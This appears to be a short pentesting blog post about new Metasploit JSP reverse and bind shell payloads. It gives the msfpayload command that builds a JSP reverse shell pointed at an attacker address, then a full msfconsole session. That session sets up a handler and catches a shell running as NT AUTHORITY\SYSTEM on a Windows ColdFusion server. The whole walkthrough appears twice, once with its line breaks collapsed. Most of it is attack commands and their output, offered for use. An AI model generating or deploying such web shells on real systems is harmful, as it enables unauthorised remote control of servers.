Stephen Fewer has pushed up a jsp reverse and jsp bind shell.http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/javaI'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rbyomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jspFrom there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole =[ msf v3.3-dev [core:3.3 api:1.0]+ -- --=[ 432 exploits - 261 payloads+ -- --=[ 21 encoders - 8 nops =[ 222 auxmsf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcpset PAYLOAD java/jsp_shell_reverse_tcp msf exploit(handler) > set LHOST 192.168.10.1LHOST => 192.168.10.1msf exploit(handler) > info Name: Generic Payload Handler Version: 6558 Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP Privileged: No License: Metasploit Framework License (BSD)Provided by: hdmAvailable targets:Id Name-- ----0 Wildcard TargetPayload information:Space: 100000Avoid: 0 charactersDescription:This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.msf exploit(handler) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- -----------Payload options (java/jsp_shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.10.1 yes The local address LPORT 4444 yes The local port SHELL cmd.exe yes The system shell to use.Exploit target: Id Name -- ---- 0 Wildcard Targetmsf exploit(handler) > exploit[*] Starting the payload handler...[*] Started reverse handler[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)Microsoft Windows [Version 5.2.3790](C) Copyright 1985-2003 Microsoft Corp.C:ColdFusion8runtimebin> whoamiwhoamint authoritysystemC:ColdFusion8runtimebin>exitexit[*] Command shell session 1 closed.
Stephen Fewer has pushed up a jsp reverse and jsp bind shell.
http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java
I'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb
yomomma@c0:~/pentest/msf3.
From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.
yomomma@c0:~/pentest/msf3.
=[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 222 aux
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > info
Name: Generic Payload Handler
Version: 6558
Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
Privileged: No
License: Metasploit Framework License (BSD)
Provided by:
hdm
Available targets:
Id Name
-- ----
0 Wildcard Target
Payload information:
Space: 100000
Avoid: 0 characters
Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\ColdFusion8\runtime\bin>
whoami
nt authority\system
C:\ColdFusion8\runtime\bin>
exit
[*] Command shell session 1 closed.
